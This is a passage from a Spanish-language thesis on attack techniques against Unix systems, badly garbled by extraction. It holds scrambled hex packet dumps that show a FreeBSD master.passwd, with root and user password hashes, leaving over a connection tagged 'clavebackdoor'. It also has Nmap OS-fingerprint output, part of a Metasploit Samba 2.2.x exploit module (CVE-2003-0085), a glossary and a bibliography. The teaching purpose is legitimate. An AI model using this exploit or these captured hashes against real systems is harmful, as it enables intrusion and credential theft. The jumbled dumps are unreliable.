65
3a
62
61
71
6e
3a
6e
30
6d
72
75
6f
2a
3a
69
2f
65
6c
3a
30
73
73
75
6f
32
3a
73
70
65
67
36
53
69
6f
3a
69
3a
65
6f
6f
2f
6e
32
6e
6e
6c
75
0a
36
64
20
2f
73
6d
3a
6d
55
63
72
61
3a
61
73
6c
2f
69
30
69
65
69
73
6c
3a
6c
72
65
62
6e
30
20
3a
6e
69
75
3a
53
2f
74
6e
6c
53
::0:0:Sendmail S
ubmission User:/
var/spool/client
mqueue:/usr/sbin
/nologin.mailnul
l:*:26:26::0:0:S
en
00
00
00
61
3a
75
76
6d
2f
6c
65
0c
94
1e
63
3a
62
61
71
6e
3a
6e
29
74
00
6b
30
6d
72
75
6f
2a
e1
3f
00
64
3a
69
2f
65
6c
3a
a2
00
d9
6f
30
73
73
75
6f
32
26
00
56
6f
3a
73
70
65
67
36
00
40
18
72
53
69
6f
3a
69
3a
17
01
12
70
65
6f
6f
2f
6e
32
31
84
07
3a
6e
6e
6c
75
0a
36
96
b9
00
2a
64
20
2f
73
6d
3a
5b
c0
63
3a
6d
55
63
72
61
3a
1f
a8
6c
32
61
73
6c
2f
69
30
08
00
61
35
69
65
69
73
6c
3a
00
02
76
3a
6c
72
65
62
6e
30
45
c0
65
32
20
3a
6e
69
75
3a
00
a8
62
35
53
2f
74
6e
6c
53
..)..&..1.[...E.
..t?..@.........
.....V....claveb
ackdoorp:*:25:25
::0:0:Sendmail S
ubmission User:/
var/spool/client
mqueue:/usr/sbin
/nologin.mailnul
l:*:26:26::0:0:S
en
00
00
00
61
61
70
2f
6e
42
75
0a
17
94
02
63
75
6f
73
64
69
73
70
31
9c
08
6b
6c
6f
62
3a
6e
72
96
93
00
64
74
6c
69
2a
64
2f
5b
00
65
6f
20
2f
6e
3a
20
73
1f
00
ff
6f
55
6d
2f
35
53
62
00
40
18
72
73
71
6e
33
61
69
0c
01
12
64
65
75
6f
3a
6e
6e
29
5c
08
6d
72
65
6c
35
64
2f
e1
65
00
61
3a
75
6f
33
62
6e
a2
c0
63
69
2f
65
67
3a
6f
6f
26
a8
6c
6c
76
3a
69
3a
78
6c
08
00
61
20
61
2f
6e
30
3a
6f
00
1e
76
44
72
75
0a
3a
2f
67
45
c0
65
65
2f
73
62
30
3a
69
00
a8
62
66
73
72
69
3a
2f
6e
..1.[...)..&..E.
......@.\e......
....e.....claveb
ackdoordmail Def
ault User:/var/s
pool/mqueue:/usr
/sbin/nologin.bi
nd:*:53:53::0:0:
Bind Sandbox:/:/
usr/sbin/nologin
.p
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 47 de 229
00
00
00
61
61
70
2f
6e
42
75
0a
0c
94
1e
63
75
6f
73
64
69
73
70
29
74
00
6b
6c
6f
62
3a
6e
72
e1
40
00
64
74
6c
69
2a
64
2f
a2
00
6d
6f
20
2f
6e
3a
20
73
26
00
ff
6f
55
6d
2f
35
53
62
00
40
18
72
73
71
6e
33
61
69
17
01
12
64
65
75
6f
3a
6e
6e
31
84
08
6d
72
65
6c
35
64
2f
96
b8
00
61
3a
75
6f
33
62
6e
5b
c0
63
69
2f
65
67
3a
6f
6f
1f
a8
6c
6c
76
3a
69
3a
78
6c
08
00
61
20
61
2f
6e
30
3a
6f
00
02
76
44
72
75
0a
3a
2f
67
45
c0
65
65
2f
73
62
30
3a
69
00
a8
62
66
73
72
69
3a
2f
6e
..)..&..1.[...E.
..t@..@.........
....m.....claveb
ackdoordmail Def
ault User:/var/s
pool/mqueue:/usr
/sbin/nologin.bi
nd:*:53:53::0:0:
Bind Sandbox:/:/
usr/sbin/nologin
.p
00
00
00
61
3a
46
65
2f
6e
34
69
17
94
02
63
36
69
72
75
0a
3a
76
31
ad
08
6b
32
6c
3a
73
5f
3a
96
ed
00
64
3a
74
2f
72
70
30
5b
00
92
6f
3a
65
6e
2f
66
3a
1f
00
5b
6f
30
72
6f
73
6c
30
00
40
18
72
3a
20
6e
62
6f
3a
0c
01
12
72
30
70
65
69
67
70
29
4b
09
6f
3a
73
78
6e
64
66
e1
0b
00
78
50
65
69
2f
3a
6c
a2
c0
63
79
61
75
73
6e
2a
6f
26
a8
6c
3a
63
64
74
6f
3a
67
08
00
61
2a
6b
6f
65
6c
36
64
00
1e
76
3a
65
2d
6e
6f
34
20
45
c0
65
36
74
75
74
67
3a
70
00
a8
62
32
20
73
3a
69
36
72
..1.[...)..&..E.
......@.K.......
.....[....claveb
ackdoorroxy:*:62
:62::0:0:Packet
Filter pseudo-us
er:/nonexistent:
/usr/sbin/nologi
n._pflogd:*:64:6
4::0:0:pflogd pr
iv
00
00
00
61
3a
46
65
2f
6e
34
69
0c
94
1e
63
36
69
72
75
0a
3a
76
29
74
00
6b
32
6c
3a
73
5f
3a
e1
41
00
64
3a
74
2f
72
70
30
a2
00
9a
6f
3a
65
6e
2f
66
3a
26
00
5b
6f
30
72
6f
73
6c
30
00
40
18
72
3a
20
6e
62
6f
3a
17
01
12
72
30
70
65
69
67
70
31
84
09
6f
3a
73
78
6e
64
66
96
b7
00
78
50
65
69
2f
3a
6c
5b
c0
63
79
61
75
73
6e
2a
6f
1f
a8
6c
3a
63
64
74
6f
3a
67
08
00
61
2a
6b
6f
65
6c
36
64
00
02
76
3a
65
2d
6e
6f
34
20
45
c0
65
36
74
75
74
67
3a
70
00
a8
62
32
20
73
3a
69
36
72
..)..&..1.[...E.
..tA..@.........
.....[....claveb
ackdoorroxy:*:62
:62::0:0:Packet
Filter pseudo-us
er:/nonexistent:
/usr/sbin/nologi
n._pflogd:*:64:6
4::0:0:pflogd pr
iv
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 48 de 229
00
00
00
61
2f
73
63
64
61
69
2a
17
94
02
63
76
62
70
68
72
6e
3a
31
bb
08
6b
61
69
3a
63
2f
2f
96
c7
00
64
72
6e
2a
70
65
6e
5b
00
62
6f
2f
2f
3a
20
6d
6f
1f
00
8c
6f
65
6e
36
70
70
6c
00
40
18
72
6d
6f
35
72
74
6f
0c
01
12
73
70
6c
3a
6f
79
67
29
3d
0a
65
74
6f
36
67
3a
69
e1
31
00
70
79
67
35
72
2f
6e
a2
c0
63
20
3a
69
3a
61
75
0a
26
a8
6c
75
2f
6e
3a
6d
73
75
08
00
61
73
75
0a
30
73
72
75
00
1e
76
65
73
5f
3a
3a
2f
63
45
c0
65
72
72
64
30
2f
73
70
00
a8
62
3a
2f
68
3a
76
62
3a
..1.[...)..&..E.
......@.=1......
....b.....claveb
ackdoorsep user:
/var/empty:/usr/
sbin/nologin._dh
cp:*:65:65::0:0:
dhcp programs:/v
ar/empty:/usr/sb
in/nologin.uucp:
*:
00
00
00
61
2f
73
63
64
61
69
2a
0c
94
1e
63
76
62
70
68
72
6e
3a
29
74
00
6b
61
69
3a
63
2f
2f
e1
42
00
64
72
6e
2a
70
65
6e
a2
00
6a
6f
2f
2f
3a
20
6d
6f
26
00
8c
6f
65
6e
36
70
70
6c
00
40
18
72
6d
6f
35
72
74
6f
17
01
12
73
70
6c
3a
6f
79
67
31
84
0a
65
74
6f
36
67
3a
69
96
b6
00
70
79
67
35
72
2f
6e
5b
c0
63
20
3a
69
3a
61
75
0a
1f
a8
6c
75
2f
6e
3a
6d
73
75
08
00
61
73
75
0a
30
73
72
75
00
02
76
65
73
5f
3a
3a
2f
63
45
c0
65
72
72
64
30
2f
73
70
00
a8
62
3a
2f
68
3a
76
62
3a
..)..&..1.[...E.
..tB..@.........
....j.....claveb
ackdoorsep user:
/var/empty:/usr/
sbin/nologin._dh
cp:*:65:65::0:0:
dhcp programs:/v
ar/empty:/usr/sb
in/nologin.uucp:
*:
00
00
00
61
30
65
63
63
2f
3a
69
17
94
02
63
3a
72
70
61
75
36
63
31
29
08
6b
55
3a
70
6c
75
3a
96
07
00
64
55
2f
75
2f
63
3a
5b
00
59
6f
43
76
62
6c
69
30
1f
00
ce
6f
50
61
6c
69
63
3a
00
40
18
72
20
72
69
62
6f
30
0c
01
12
36
70
2f
63
65
0a
3a
29
cf
0b
36
73
73
3a
78
70
50
e1
f1
00
3a
65
70
2f
65
6f
6f
a2
c0
63
36
75
6f
75
63
70
73
26
a8
6c
36
64
6f
73
2f
3a
74
08
00
61
3a
6f
6c
72
75
2a
20
00
1e
76
3a
2d
2f
2f
75
3a
4f
45
c0
65
30
75
75
6c
63
36
66
00
a8
62
3a
73
75
6f
70
38
66
..1.[...)..&..E.
..)...@.........
....Y.....claveb
ackdoor66:66::0:
0:UUCP pseudo-us
er:/var/spool/uu
cppublic:/usr/lo
cal/libexec/uucp
/uucico.pop:*:68
:6::0:0:Post Off
ic
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 49 de 229
00
00
00
61
30
65
63
63
2f
3a
69
0c
94
1e
63
3a
72
70
61
75
36
63
29
74
00
6b
55
3a
70
6c
75
3a
e1
43
00
64
55
2f
75
2f
63
3a
a2
00
61
6f
43
76
62
6c
69
30
26
00
ce
6f
50
61
6c
69
63
3a
00
40
18
72
20
72
69
62
6f
30
17
01
12
36
70
2f
63
65
0a
3a
31
84
0b
36
73
73
3a
78
70
50
96
b5
00
3a
65
70
2f
65
6f
6f
5b
c0
63
36
75
6f
75
63
70
73
1f
a8
6c
36
64
6f
73
2f
3a
74
08
00
61
3a
6f
6c
72
75
2a
20
00
02
76
3a
2d
2f
2f
75
3a
4f
45
c0
65
30
75
75
6c
63
36
66
00
a8
62
3a
73
75
6f
70
38
66
..)..&..1.[...E.
..tC..@.........
....a.....claveb
ackdoor66:66::0:
0:UUCP pseudo-us
er:/var/spool/uu
cppublic:/usr/lo
cal/libexec/uucp
/uucico.pop:*:68
:6::0:0:Post Off
ic
00
00
00
61
6e
2f
77
6f
6e
3a
69
17
94
02
63
6f
73
3a
72
65
2f
6e
31
9a
08
6b
6e
62
2a
6c
72
75
96
2e
00
64
65
69
3a
64
3a
73
5b
00
e8
6f
78
6e
38
20
2f
72
1f
00
7e
6f
69
2f
30
57
6e
2f
00
40
18
72
73
6e
3a
69
6f
73
0c
01
12
65
74
6f
38
64
6e
62
29
5e
0c
20
65
6c
30
65
65
69
e1
ca
00
4f
6e
6f
3a
20
78
6e
a2
c0
63
77
74
67
3a
57
69
2f
26
a8
6c
6e
3a
69
30
65
73
6e
08
00
61
65
2f
6e
3a
62
74
6f
00
1e
76
72
75
0a
30
20
65
6c
45
c0
65
3a
73
77
3a
4f
6e
6f
00
a8
62
2f
72
77
57
77
74
67
..1.[...)..&..E.
......@.^.......
.....~....claveb
ackdoore Owner:/
nonexistent:/usr
/sbin/nologin.ww
w:*:80:80::0:0:W
orld Wide Web Ow
ner:/nonexistent
:/usr/sbin/nolog
in
00
00
00
61
6e
2f
0c
94
1e
63
6f
73
29
74
00
6b
6e
62
e1
44
00
64
65
69
a2
00
f0
6f
78
6e
26
00
7e
6f
69
2f
00
40
18
72
73
6e
17
01
12
65
74
6f
31
84
0c
20
65
6c
96
b4
00
4f
6e
6f
5b
c0
63
77
74
67
1f
a8
6c
6e
3a
69
08
00
61
65
2f
6e
00
02
76
72
75
0a
45
c0
65
3a
73
77
00
a8
62
2f
72
77
..)..&..1.[...E.
..tD..@.........
.....~....claveb
ackdoore Owner:/
nonexistent:/usr
/sbin/nologin.ww
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 50 de 229
77
6f
6e
3a
69
3a
72
65
2f
6e
2a
6c
72
75
3a
64
3a
73
38
20
2f
72
30
57
6e
2f
3a
69
6f
73
38
64
6e
62
30
65
65
69
3a
20
78
6e
3a
57
69
2f
30
65
73
6e
3a
62
74
6f
30
20
65
6c
3a
4f
6e
6f
57
77
74
67
w:*:80:80::0:0:W
orld Wide Web Ow
ner:/nonexistent
:/usr/sbin/nolog
in
00
00
00
61
3a
30
73
3a
69
5a
58
17
94
02
63
36
3a
65
2f
6e
51
4c
31
6f
08
6b
35
55
72
75
0a
42
96
99
00
64
35
6e
3a
73
6d
37
5b
00
2c
6f
33
70
2f
72
61
4b
1f
00
1d
6f
34
72
6e
2f
72
64
00
40
18
72
3a
69
6f
73
63
24
0c
01
12
0a
36
76
6e
62
65
58
29
89
0d
6e
35
69
65
69
6c
51
e1
5f
00
6f
35
6c
78
6e
6f
45
a2
c0
63
62
33
65
69
2f
3a
32
26
a8
6c
6f
34
67
73
6e
24
77
08
00
61
64
3a
65
74
6f
31
4d
00
1e
76
79
3a
64
65
6c
24
47
45
c0
65
3a
30
20
6e
6f
2f
42
00
a8
62
2a
3a
75
74
67
69
44
..1.[...)..&..E.
..o...@.._......
....,.....claveb
ackdoor.nobody:*
:65534:65534::0:
0:Unprivileged u
ser:/nonexistent
:/usr/sbin/nolog
in.marcelo:$1$/i
ZQB7Kd$XQE2wMGBD
XL
00
00
00
61
3a
30
73
3a
69
5a
58
0c
94
1e
63
36
3a
65
2f
6e
51
4c
29
74
00
6b
35
55
72
75
0a
42
e1
45
00
64
35
6e
3a
73
6d
37
a2
00
34
6f
33
70
2f
72
61
4b
26
00
1d
6f
34
72
6e
2f
72
64
00
40
18
72
3a
69
6f
73
63
24
17
01
12
0a
36
76
6e
62
65
58
31
84
0d
6e
35
69
65
69
6c
51
96
b3
00
6f
35
6c
78
6e
6f
45
5b
c0
63
62
33
65
69
2f
3a
32
1f
a8
6c
6f
34
67
73
6e
24
77
08
00
61
64
3a
65
74
6f
31
4d
00
02
76
79
3a
64
65
6c
24
47
45
c0
65
3a
30
20
6e
6f
2f
42
00
a8
62
2a
3a
75
74
67
69
44
..)..&..1.[...E.
..tE..@.........
....4.....claveb
ackdoor.nobody:*
:65534:65534::0:
0:Unprivileged u
ser:/nonexistent
:/usr/sbin/nolog
in.marcelo:$1$/i
ZQB7Kd$XQE2wMGBD
XL
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 51 de 229
00
00
00
61
5a
30
64
6f
2f
00
00
17
94
02
63
2f
3a
65
3a
62
00
00
31
ca
08
6b
3a
4d
7a
2f
61
00
96
08
00
64
31
61
3a
75
73
00
5b
00
4c
6f
30
72
2f
73
68
00
1f
00
58
6f
30
63
68
72
0a
00
00
40
18
72
31
65
6f
2f
00
00
0c
01
12
72
3a
6c
6d
6c
00
00
29
2e
0e
31
31
6f
65
6f
00
00
e1
f0
00
2f
30
20
2f
63
00
00
a2
c0
63
6c
30
46
6d
61
00
00
26
a8
6c
6b
31
65
61
6c
00
00
08
00
61
51
3a
72
72
2f
00
00
00
1e
76
69
3a
6e
63
62
00
00
45
c0
65
51
30
61
65
69
00
00
00
a8
62
4f
3a
6e
6c
6e
00
00
..1.[...)..&..E.
......@.........
....LX....claveb
ackdoorr1/lkQiQO
Z/:1001:1001::0:
0:Marcelo Fernan
dez:/home/marcel
o:/usr/local/bin
/bash...........
................
..
00
00
00
61
5a
30
64
6f
2f
00
00
0c
94
1e
63
2f
3a
65
3a
62
00
00
29
74
00
6b
3a
4d
7a
2f
61
00
e1
46
00
64
31
61
3a
75
73
00
a2
00
54
6f
30
72
2f
73
68
00
26
00
58
6f
30
63
68
72
0a
00
00
40
18
72
31
65
6f
2f
00
00
17
01
12
72
3a
6c
6d
6c
00
00
31
84
0e
31
31
6f
65
6f
00
00
96
b2
00
2f
30
20
2f
63
00
00
5b
c0
63
6c
30
46
6d
61
00
00
1f
a8
6c
6b
31
65
61
6c
00
00
08
00
61
51
3a
72
72
2f
00
00
00
02
76
69
3a
6e
63
62
00
00
45
c0
65
51
30
61
65
69
00
00
00
a8
62
4f
3a
6e
6c
6e
00
00
..)..&..1.[...E.
..tF..@.........
....TX....claveb
ackdoorr1/lkQiQO
Z/:1001:1001::0:
0:Marcelo Fernan
dez:/home/marcel
o:/usr/local/bin
/bash...........
................
..
00
00
00
61
44
72
32
3a
0a
30
72
17
94
02
63
3a
2e
30
35
23
30
48
31
da
08
6b
20
70
30
36
0a
6c
96
0f
00
64
73
61
35
20
72
24
5b
00
31
6f
72
73
2f
62
6f
50
1f
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
0c
01
12
23
65
64
2f
6f
3a
62
29
1e
0f
20
74
2c
30
6b
24
37
e1
e9
00
24
63
76
36
73
31
57
a2
c0
63
46
2f
20
20
20
24
64
26
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
1e
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..1.[...)..&..E.
......@.........
....1.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 52 de 229
00
00
00
61
44
72
32
3a
0a
30
72
0c
94
1e
63
3a
2e
30
35
23
30
48
29
74
00
6b
20
70
30
36
0a
6c
e1
47
00
64
73
61
35
20
72
24
a2
00
39
6f
72
73
2f
62
6f
50
26
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
17
01
12
23
65
64
2f
6f
3a
62
31
84
0f
20
74
2c
30
6b
24
37
96
b1
00
24
63
76
36
73
31
57
5b
c0
63
46
2f
20
20
20
24
64
1f
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
02
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..)..&..1.[...E.
..tG..@.........
....9.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 53 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 54 de 229
Como se puede ver, los Retrying OS detection (try #1) informan sobre la
ejecucin de cada uno de los 5 tests detallados en el apartado 5.1.1. Luego, como
no posee la firma del SO remoto en su BD, Nmap la imprime por pantalla. El SO
en cuestin es un FreeBSD 7.0, cuya firma la versin 4.53 de Nmap an no
posee175.
Luego de procesar un poco el texto del fingerprint (impreso as por Nmap a
propsito para facilitar el proceso de reporte del mismo), se puede obtener esto en
primera instancia:
SCAN(V=4.53 D=4/2 OT=21 CT=1 CU=30447 PV=Y DS=1 G=Y M=000C29 TM=47F3CB14
P=x86_64-unknown-linux-gnu)
SEQ(SP=105 GCD=2 ISR=108 TI=I II=I SS=S TS=21)
SEQ(SP=100 GCD=1 ISR=10E TI=I II=I SS=S TS=20)
SEQ(SP=104 GCD=1 ISR=10A TI=I II=I SS=S TS=21)
SEQ(SP=105 GCD=1 ISR=108 TI=I II=I SS=S TS=20)
SEQ(SP=105 GCD=1 ISR=107 TI=I II=I SS=S TS=21)
OPS(O1=M5B4NW3ST11 O2=M578NW3ST11 O3=M280NW3NNT11 O4=M5B4NW3ST11
O5=M218NW3ST11 O6=M109ST11)
WIN(W1=FFFF W2=FFFF W3=FFFF W4=FFFF W5=FFFF W6=FFFF)
ECN(R=Y DF=Y T=40 W=FFFF O=M5B4NW3SLN CC=N Q=)
T1(R=Y DF=Y T=40 S=O A=S+ F=AS RD=0 Q=)
T2(R=N)
T3(R=Y DF=Y T=40 W=FFFF S=O A=S+ F=AS O=M109NW3ST11 RD=0 Q=)
T4(R=Y DF=Y T=40 W=0 S=A A=Z F=R O= RD=0 Q=)
T5(R=Y DF=Y T=40 W=0 S=Z A=S+ F=AR O= RD=0 Q=)
T6(R=Y DF=Y T=40 W=0 S=A A=Z F=R O= RD=0 Q=)
T7(R=Y DF=Y T=40 W=0 S=Z A=S F=AR O= RD=0 Q=)
U1(R=Y DF=N T=40 TOS=0 IPL=38 UN=0 RIPL=G RID=G RIPCK=G RUCK=G RUL=G
RUD=G)
IE(R=Y DFI=S T=40 TOSI=S CD=S SI=S DLI=S)
175 Cabe aclarar que la ltima versin de Nmap, la 4.60 ya incluye la firma de este SO en su Base.
Tambin se puede obtener la ltima versin del archivo con la base de firmas de Nmap nmapos-db en la siguiente URL: http://nmap.org/data/nmap-os-db y luego reemplazar el original.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 55 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 56 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 57 de 229
},
'Author'
'License'
'Version'
'References'
[
=> [ 'hdm' ],
=> MSF_LICENSE,
=> '$Revision: 5365 $',
=>
],
'Privileged'
'Payload'
{
=> true,
=>
'Targets'
[ 'BID', '7106' ],
[ 'CVE', '2003-0085' ],
'Space'
=> 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
=>
[
["Samba 2.2.x Linux x86",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Rets' => [0x01020304, 0x41424344],
},
],
],
'DisclosureDate' => 'Apr 7 2003'))
register_options([Opt::RPORT(139)], self.class)
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 58 de 229
0x081b8138
connect
smb_login
targ_address = 0xfffbb7d0
#
# Send a NTTrans request with ParameterCountTotal set to the buffer length
#
subcommand
param
body
setup_count
setup_data
data = param
=
=
=
=
=
+
1
''
''
0
''
body
pkt = CONST::SMB_NTTRANS_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length + (setup_count * 2) - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
pkt['Payload'].v['ParamCountTotal'] =12000
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCountMax'] = 1024
pkt['Payload'].v['DataCountMax'] = 65504
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup_data
pkt['Payload'].v['Subcommand'] = subcommand
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
#
# Send a NTTrans secondary request with the magic displacement
#
param = pattern
body = ''
data = param + body
pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length - 4
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 59 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 60 de 229
los
Sistemas.
Ver:
http://en.wikipedia.org/wiki/Process_%28computing%29
http://en.wikipedia.org/wiki/Thread_%28computer_science%29
Hash: Un Hash o funcin de dispersin es una funcin matemtica que a partir de un parmetro de
entrada, genera un valor nico de salida (cuyas probabilidades de ser generado por otro parmetro
son nfimas). Hay algoritmos de hash estndar, como por ejemplo MD5 y SHA-1.
Ver:http://en.wikipedia.org/wiki/Cryptographic_hash_function
Honeypot: Un honeypot (tarro de miel) es un sistema trampa instalado adrede para captar la
atencin de posbiles intrusos, probablemente con vulnerabilidades sencillas de vencer, con el
objetivo de desviar la atencin de los hosts que s son de importancia y monitorear los intentos de
ataque para bloquearlos y aprender las tcnicas utilizadas por los intrusos.
NAT Network Address Translation (Traduccin de Direcciones de Red): Tcnica para reescribir
la direccin origen o destino de un paquete IP en un dispositivo que maneja dichos paquetes. Por
ejemplo, es empleada comnmente en los dispositivos de acceso a internet para conmutar una
nica IP pblica entre varias IPs privadas de una LAN, entre otros usos muy frecuentes tambin.
Ver: http://en.wikipedia.org/wiki/Network_address_translation
Ofuscacin (software): Tcnica que modifica sustancialmente un programa sin alterar su
funcionamiento original, con el objetivo de camuflarlo o dificultar en gran medida su
comprensin por parte de terceros. Como efecto colateral puede significar tambin una compresin
del programa. Ver: http://en.wikipedia.org/wiki/Obfuscated_code
Opcode: Una instruccin de procesador se compone generalmente por un cdigo de operacin y
dos operandos. El primero en ingls se lo abrevia como Opcode, que bsicamente indica qu hacer
con los dos operandos que se le indica. Por ejemplo, en lenguaje ensamblador, MOV AX, BX es
una instruccin donde se copia el contenido del registro BX al AX (segn la nomenclatura de
Intel), y MOV es el Opcode. Otros Opcodes muy comunes en la arquitectura x86 incluyen JMP,
CMP, Call, ADD, MUL, PUSH, POP, etc.
Ver:
Tabla rpida de Opcodes 8086: http://www.jegerlehner.com/intel/opcode_es.html
Intel Architecture Software Developer's Manual, Volume 2: Instruction Set Reference Manual:
http://developer.intel.com/design/pentium/manuals/243191.htm
Penetration Testing: Test de penetracin; se lo conoce como un proceso tpico de las auditoras de
seguridad, donde se simula ser un cracker intentando vulnerar la seguridad de una organizacin o
de un sistema de la misma.
Proxy: Un proxy es un software o dispositivo que oficia de intermediario entre un cliente y un
servidor. Por ejemplo, un programa establece conexin con el proxy y le pide acceder a un cierto
equipo/servicio, por ejemplo una pgina web; el proxy accede por l y lo devuelve al programa
original, evitando que ste tenga que acceder directamente al proveedor.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 62 de 229
interpretado
que
tpicamente
se
encarga
de
automatizar
tareas.
Ver:
http://en.wikipedia.org/wiki/Scripting_language
Shell: Si bien en castellano la traduccin literal es concha o cscara, en el ambiente
informtico se la conoce tambin como Consola o Terminal; es una interfaz que provee el
sistema al usuario en formato de texto, que acepta rdenes o comandos que luego el sistema
ejecuta. Tambin se la suele llamar CLI, por Command Line Interface (Interfaz de Lnea de
Comando), antnimo de GUI Graphical User Interface (Interfaz Grfica de Usuario).
Sockets Raw: Es una API de la capa de Red de un Sistema Operativo, presente en la mayora de
ellos, que provee acceso completo a los encabezados de las tramas a enviar y recibidas, no slo al
payload. Nmap y la gran mayora de los port scanners o herramientas de red hacen uso de ella.
Spoofing: Parodia en castellano. Spoofing trata de un conjunto de tcnicas para falsificar y
hacer pasar un elemento invlido o no autorizado por otro que s lo est.
SSH: Secure SHell (Shell Seguro en castellano). Protocolo de red que brinda una interfaz de
comandos a una mquina en forma remota; a diferencia de Telnet, Rlogin, etc., SSH brinda
autenticacin por PKI y encriptacin del trfico.
SSL: Secure Sockets Layer, Capa de Sockets Seguro. Es una versin anterior de lo que ahora es
TLS, con los mismos objetivos y caractersticas.
TLS: Transport Layer Security, Securidad en la Capa de Transporte. Es un protocolo de seguridad
que provee autenticacin mutua y encriptacin para protocolos fiables de la Capa de Transporte
del Modelo OSI (TCP en el modelo TCP/IP).
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 63 de 229
Bibliografa
ARPA_TFI: Arpanet - The First Internet, http://www.livinginternet.com/i/ii.htm
ART_APPFING: The Art of Fingerprinting - Slides,
http://md.hudora.de/presentations/#itunderground2005-2
BELL: Multics General Information and FAQ, http://www.belllabs.com/history/unix/somethingelse.html
CM_TX0: The TX-0: Its past and present, http://ed-thelen.org/comphist/TheCompMusRep/TCMR-V08.html
CRAY:Seymour Cray. Autor: Cray Inc., http://www.cray.com/about_cray/seymourcray.html
CSCO_INETBAS:Internetworking Basics. Autor: Cisco Systems,
http://www.cisco.com/en/US/docs/internetworking/technology/handbook/Intro-to-Internet.html
CUHI: Columbia University Computing History,
http://www.columbia.edu/acis/history/pdp10.html
CYBGEO: ARPANet Logical Map, http://www.cybergeography.org/atlas/historical.html
DEC-WEB: The DEC Emulation Web Page, http://www.aracnet.com/~healyzh/decemu.html
EBHL:The Heroic Hacker: Legends of the Computer Age. Autor: Erik Bunvand,
http://www.cs.utah.edu/~elb/folklore/afs-paper/afs-paper.html
ERBH:How To Become a Hacker. Autor: Eric Steven Raymond, http://catb.org/~esr/faqs/hackerhowto.html
ERHH:A Brief History of Hackerdom. Autor: Eric Steven Raymond, http://www.tuxedo.org/~esr
ERJF: The Jargon File, http://catb.org/jargon/
ERJFH:Trmino 'hacker'. Autor: Varios, Eric Raymond,
http://www.catb.org/jargon/html/H/hacker.html
FING_PAS:Know Your Enemy: Passive Fingerprinting. Autor: Craig Smith, Peter Grundl ,
http://project.honeynet.org/papers/finger/
FSF: Free Software Fundation, http://www.fsf.org/
FWALK:Firewalking - A Traceroute-Like Analysis of IP Packet Responses to Determine Gateway
Access Control Lists. Autor: David Goldsmith, Michael Schiffman,
http://www.packetfactory.net/firewalk/firewalk-final.pdf
GNU: GNU: GNU is not Unix, http://www.gnu.org/
HACK_BASICS:Hacking: The Basics. Autor: Zachary Wilson, Martin Poulin,
https://www2.sans.org/reading_room/whitepapers/hackers/955.php
HACK_BEW:Hackers Beware. Eric Cole, 2001, ISBN:0-7357-1009-0,
http://books.google.com.ar/books?id=fNRuUrhyd4QC
HACK_ETHIC:The Hacker Ethic and the Spirit of the Information Age. Himanen, Pekka;
Torvalds, Linus; Castells, Manuel, 2001, ISBN:ISBN 0-375-50566-0,
http://www.amazon.com/Hacker-Ethic-Pekka-Himanen/dp/0375505660
HACK_EXP:Hacking Exposed. Stuart McClure, Joel Scambray, George Kutz, 2005,
ISBN:9780072260816, http://www.amazon.com/Hacking-Exposed-5th/dp/0072260815
HACK_STACK:Hack the Stack. Michael Gregg, Stephen Watkins, George Mays, Chris Ries, Ron
Bandes, Brandon Franklin, 2006, ISBN:1-59749-109-8, http://books.google.com.ar/books?
id=t_0HYnWCdUoC